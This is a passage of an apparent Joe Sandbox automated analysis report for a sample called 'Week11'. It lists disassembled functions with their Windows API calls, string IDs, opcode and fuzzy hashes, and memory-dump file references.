                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 0-670065755
                                • Opcode ID: 04cd663a305100ff744e96d32187111e82a4a4c72b6d18e17701d8053a8f4d5b
                                • Instruction ID: 8e4c9e4c0d213e81a69a2f097f07e83ae8129e60fcc16c5653f83553ae497e9c
                                • Opcode Fuzzy Hash: 04cd663a305100ff744e96d32187111e82a4a4c72b6d18e17701d8053a8f4d5b
                                • Instruction Fuzzy Hash: CFB1D0B2D152689AEB20CB24DC547EAB6B5EF94300F0480FAD84CA7681E67D4FC18F56
                                Function 0040C6DA Relevance: 15.5, Strings: 12, Instructions: 512COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: 7b85bc52e6808b9baae9e79d314a20e5738770e981a817103ffb0fb2372c2800
                                • Instruction ID: 914a459b03d2a2b63b855c5f7d67586353b6cb6e6c31b5fdc1fcf3b625d68fdb
                                • Opcode Fuzzy Hash: 7b85bc52e6808b9baae9e79d314a20e5738770e981a817103ffb0fb2372c2800
                                • Instruction Fuzzy Hash: 6B12BFB2D046689AE7248B15DC94BEBBA75EF84310F1441FAD80DA7280E33D5EC5CF66
                                Function 0040C21D Relevance: 15.4, Strings: 12, Instructions: 385COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: 094c74763ee6e4f48dbf42b18b6cf1c1ad80c5b7682997bc4b0f76ef296411d9
                                • Instruction ID: da7636832d6d3e4347b5bc72744a32114747a310d61eee35d2d044c8e859236b
                                • Opcode Fuzzy Hash: 094c74763ee6e4f48dbf42b18b6cf1c1ad80c5b7682997bc4b0f76ef296411d9
                                • Instruction Fuzzy Hash: ABF17D71D05268DBEB24CB14CC90BEAB7B5FB84304F1482FAD44DA6281D6395EC2CF56
                                Function 0040C465 Relevance: 15.2, Strings: 12, Instructions: 211COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: ebb65651caa7aede6cb4031899aed8a803e9f11667bf4dd6a799a52f4202491c
                                • Instruction ID: 69bacb652bb99dfde4aee098304b2cdbed0ced8900f92b2597216527d9bcfb0e
                                • Opcode Fuzzy Hash: ebb65651caa7aede6cb4031899aed8a803e9f11667bf4dd6a799a52f4202491c
                                • Instruction Fuzzy Hash: BC81E1B1D08668DAF7218B24DC94BEABAB5EF90300F0481FAD44DA7681D37D1EC58F16
                                Function 0040C4CD Relevance: 15.2, Strings: 12, Instructions: 208COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: 14bf14cefdc2b72e7d6837cf3c8567c9f606d2ab2b2aa7be318d4205c241f5ec
                                • Instruction ID: a64aedf2c8d6eacc216962f0a1ed59b9aaa95d6b6d6511588f4be3c2821d3289
                                • Opcode Fuzzy Hash: 14bf14cefdc2b72e7d6837cf3c8567c9f606d2ab2b2aa7be318d4205c241f5ec
                                • Instruction Fuzzy Hash: D581E1B1D08668DAF7218B24DC94BEABAB5EF90304F0481FAC44DA76C0D73D1EC18B16
                                Function 0040C471 Relevance: 15.2, Strings: 12, Instructions: 206COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: 335d1bd73f922021f96bf1e55129336020ca8556b6c23ec9cebbc5f9e032945b
                                • Instruction ID: 292ddd3b266090356df2182c853dd82522a8dac9334ef34c09640febfcc53569
                                • Opcode Fuzzy Hash: 335d1bd73f922021f96bf1e55129336020ca8556b6c23ec9cebbc5f9e032945b
                                • Instruction Fuzzy Hash: C981D1B1D08668DAF7218B24DC94BEABAB5EF90300F0481FAD44DA7681D37D1EC58F16
                                Function 0040C717 Relevance: 15.2, Strings: 12, Instructions: 197COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: 06b2a0d70721d91fac1293ca16444907a88d2e3ddb0061ec035759c462f42aaa
                                • Instruction ID: c658fcb4eb42c25c48cc16f900622dbbb37ec02de6ee8474502fae10e98cbf88
                                • Opcode Fuzzy Hash: 06b2a0d70721d91fac1293ca16444907a88d2e3ddb0061ec035759c462f42aaa
                                • Instruction Fuzzy Hash: 48710762D08268DAF7208B24DC44BEBBA75EF94300F0481FAD44DA7281D37D1EC5CB66
                                Function 0040C58F Relevance: 15.2, Strings: 12, Instructions: 167COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: d20e6f8add3cc496b25eee42fc6c94b88c60413763a817ac61984a952a94720e
                                • Instruction ID: b1c9b549e76fbac57a4e755773afad4df7d121e39477e2b0d97b09d2f2632640
                                • Opcode Fuzzy Hash: d20e6f8add3cc496b25eee42fc6c94b88c60413763a817ac61984a952a94720e
                                • Instruction Fuzzy Hash: 4A61D4A1D08699CEF7218B24DC94BEABA76EF90300F0481FAD44D676C1D37E1EC58B56
                                Function 0040C5BD Relevance: 15.2, Strings: 12, Instructions: 155COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: b95c76e2ca22fc866fbc818bf191a40661a55585611bb795bc6a8716bffec365
                                • Instruction ID: 97c516a55b3af2165b9cc6a01ac0630e803d37c015ccf732dc7d52516949326c
                                • Opcode Fuzzy Hash: b95c76e2ca22fc866fbc818bf191a40661a55585611bb795bc6a8716bffec365
                                • Instruction Fuzzy Hash: E851D1A1D08699CEF7218B24DC54BEABA76EF91300F0481FAC04D676C1D37E0EC58B56
                                Function 0040C603 Relevance: 15.1, Strings: 12, Instructions: 140COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: 74988f59038c82e649426195d26bab4ecbd9dd27a8aec18a6f9d9ebd2319cecf
                                • Instruction ID: 7c4d75c6526d95267b203406be231b8214f60a9b2a645593e80a69d7ea6768e6
                                • Opcode Fuzzy Hash: 74988f59038c82e649426195d26bab4ecbd9dd27a8aec18a6f9d9ebd2319cecf
                                • Instruction Fuzzy Hash: 2C51E4A1D0C6A9CAF7218724DC54BEABA76EF91304F0481F9C04D6B6C1D77E0EC58B66
                                Function 00470440 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 302COMMON
                                Download Yara Rule
                                APIs
                                • FindResourceW.KERNEL32(?,0000006C,UIDATA,1D1D1D8C,?,00000008,?), ref: 00470497
                                • LoadResource.KERNEL32(?,00000000), ref: 004704B5
                                • SizeofResource.KERNEL32(?,00000000), ref: 004704D2
                                • FreeResource.KERNEL32(00000000), ref: 004704E4
                                • _memset.LIBCMT ref: 00470523
                                • LockResource.KERNEL32(00000000), ref: 0047052C
                                • FreeResource.KERNEL32(00000000), ref: 00470827
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Resource$Free$FindLoadLockSizeof_memset
                                • String ID: UIDATA
                                • API String ID: 22797042-37798676
                                • Opcode ID: 378b3840f4d67aacf5828a0d82858fd3667b8e2b66c82b16812347760bbfe2da
                                • Instruction ID: 2929f7a4e9b14c725ebed58b75a369a5a9340c9cc9a66a4216e42831b50c3819
                                • Opcode Fuzzy Hash: 378b3840f4d67aacf5828a0d82858fd3667b8e2b66c82b16812347760bbfe2da
                                • Instruction Fuzzy Hash: 87C1F071D01218DBDF14DFA8C881BEEB7B5AF44304F1481AEE909AB241DB786E45CF95
                                Function 0047A660 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 79memorythreadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 0047A66A
                                • OpenThread.KERNEL32(00000040,00000001,-00000008,00000000,?,?,?,?,?,?,?,0047A5C0,?,00475D38,00000000,00000000), ref: 0047A6C5
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,0047A5C0,?,00475D38,00000000,00000000,00000CCC,00000040), ref: 0047A6CB
                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,0047A5C0,?,00475D38,00000000,00000000,00000CCC,00000040), ref: 0047A6FA
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,0047A5C0,?,00475D38,00000000,00000000,00000CCC), ref: 0047A704
                                • OutputDebugStringW.KERNEL32(****** ,?,?,?,?,?,?,?,0047A5C0,?,00475D38,00000000,00000000,00000CCC,00000040), ref: 0047A711
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,0047A5C0,?,00475D38,00000000,00000000,00000CCC,00000040), ref: 0047A71A
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: HeapThread$CloseCurrentDebugErrorFreeHandleLastOpenOutputProcessString
                                • String ID: ******
                                • API String ID: 2450575844-1974978773
                                • Opcode ID: a615dbd2ae5ccc97e5f02d8bab2d06328ec7d4b9a372332ff70091f070a2f016
                                • Instruction ID: 8a9e233426850eda64e1f5128e765e615bddae31fa46ce39685b5e67f2a37fdf
                                • Opcode Fuzzy Hash: a615dbd2ae5ccc97e5f02d8bab2d06328ec7d4b9a372332ff70091f070a2f016
                                • Instruction Fuzzy Hash: D3315A786007019FC7189B24D884BAB77B4AF85742F15867EE88997350DB34A811CF6B
                                Function 0047E640 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 0047E6B7
                                • GetVersionExW.KERNEL32 ref: 0047E6D2
                                • GetVersionExW.KERNEL32(?), ref: 0047E6E5
                                • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 0047E6F5
                                • GetProcAddress.KERNEL32(00000000), ref: 0047E6FC
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Version$AddressHandleModuleProc_memset
                                • String ID: GetNativeSystemInfo$kernel32.dll
                                • API String ID: 3011030232-192647395
                                • Opcode ID: 9f8ff7a418be1d7efb5618ce7a2fccf31ce151ade9ce7797f9bfbbf4b54cd3c4
                                • Instruction ID: af40fee38c0cad752181b75b97ecc5d2eae555b021b8fd5725ab18872ef9ea95
                                • Opcode Fuzzy Hash: 9f8ff7a418be1d7efb5618ce7a2fccf31ce151ade9ce7797f9bfbbf4b54cd3c4
                                • Instruction Fuzzy Hash: 85214BB09043418FD754EF7AD881BDB7BE4AB8C704F844A6EE55CC2290E778D5488F9A
                                Function 0047A0E0 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(1D1D1D8C), ref: 0047A10A
                                • HeapLock.KERNEL32(00000000), ref: 0047A130
                                • HeapWalk.KERNEL32(00000000,?), ref: 0047A14A
                                • HeapWalk.KERNEL32(00000000,?), ref: 0047A17E
                                • HeapUnlock.KERNEL32(00000000), ref: 0047A192
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Heap$Walk$LockProcessUnlock
                                • String ID:
                                • API String ID: 2227978497-0
                                • Opcode ID: 81c1e659d896c1b8b40812ab09a17c939bf94fdb85d8e5b5ee7bdaf731dcfabe
                                • Instruction ID: bbe46ce4e01aed47a1f70f3d08ba4753ccc444e6a795538b985fec849003399e
                                • Opcode Fuzzy Hash: 81c1e659d896c1b8b40812ab09a17c939bf94fdb85d8e5b5ee7bdaf731dcfabe
                                • Instruction Fuzzy Hash: 6C21D1325083419FE311DF29D844A9FB7E8EBC5661F80462FF84593390D739A945CBAB
                                Function 0044A940 Relevance: 5.4, Strings: 4, Instructions: 392COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: _memcpy_s
                                • String ID: date$logs$path$version
                                • API String ID: 2001391462-1468544551
                                • Opcode ID: ffeedcf09fd024d02930604d4351f1d9c4e20f5f3bc065c2dab0befd4e08b293
                                • Instruction ID: 78fcfeb3040343104aede56ec2e0158854f21d25d4d16607a0e9590502c573f4
                                • Opcode Fuzzy Hash: ffeedcf09fd024d02930604d4351f1d9c4e20f5f3bc065c2dab0befd4e08b293
                                • Instruction Fuzzy Hash: 70026C75D00258CFDB14CF99C884ADDBBB2FF85304F2981AEC40A6B356D774AA49CB91
                                Function 00484124 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
